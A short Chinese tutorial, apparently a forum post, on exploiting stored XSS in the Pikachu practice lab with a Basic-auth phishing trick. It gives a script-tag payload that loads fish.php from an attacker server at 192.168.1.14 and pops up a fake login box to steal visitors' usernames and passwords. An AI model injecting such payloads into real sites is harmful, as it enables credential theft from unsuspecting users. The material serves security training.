存储型XSS漏洞利用
我们这里用一个Basic认证去做这个钓鱼攻击。我们在一个存在XSS漏洞的页面上面嵌入一个恶意请求,当用户打开这个页面。这个页面就会像攻击者的服务器发送请求,这个请求会返回一个Basic认证的头部。这时候会弹出一个提示框,要求受害者输入账号密码,从而盗取用户的账号密码首先攻击者需要构造一个钓鱼页面,用来将发送Basic认证的认证框。修改 /var/www/html/pikachu/pkxss/xfish 下的 fish.php 文件,将IP地址改为攻击者的服务器地址。
构造的Payload如下
<script src="http://192.168.1.14/pkxss/xfish/fish.php"></script> 当用户访问这个留言板时,会出现下面的认证框(永久性)
https://blog.bbskali.cn/usr/uploads/2019/11/2939183669.mp4
页:
[1]